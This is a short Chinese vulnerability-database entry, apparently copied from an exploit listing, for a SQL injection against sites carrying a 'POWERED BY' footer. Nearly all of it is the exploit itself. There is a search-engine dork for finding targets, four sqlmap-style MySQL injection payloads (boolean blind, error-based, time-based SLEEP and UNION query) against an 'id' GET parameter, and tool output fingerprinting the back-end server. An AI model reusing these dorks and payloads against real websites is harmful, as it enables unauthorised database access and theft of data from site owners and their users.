POWERED BY All Sites SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1036962 漏洞类型
发布时间 2017-07-27 更新时间 2017-07-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2017070178
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-- Dork: inurl:.php?id= intetxt: POWERED BY
-- Prueba: Win10
-- Fecha: 27/07/2017
-- PoFF: 
=============00
---- ---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=25' AND 3423=3423-- udru

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=25' AND (SELECT 3457 FROM(SELECT COUNT(*),CONCAT(0x71786a7671,(SELECT (ELT(3457=3457,1))),0x7171627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- prNk

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=25' AND SLEEP(5)-- xwcp

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=25' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7671,0x4371714549584a476c4f617972665a457557544b444b6e686254436e614472695a4269744a4f6b55,0x7171627171),NULL,NULL,NULL,NULL-- ULWS
---
[04:02:56] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.6.24
back-end DBMS: MySQL >= 5.0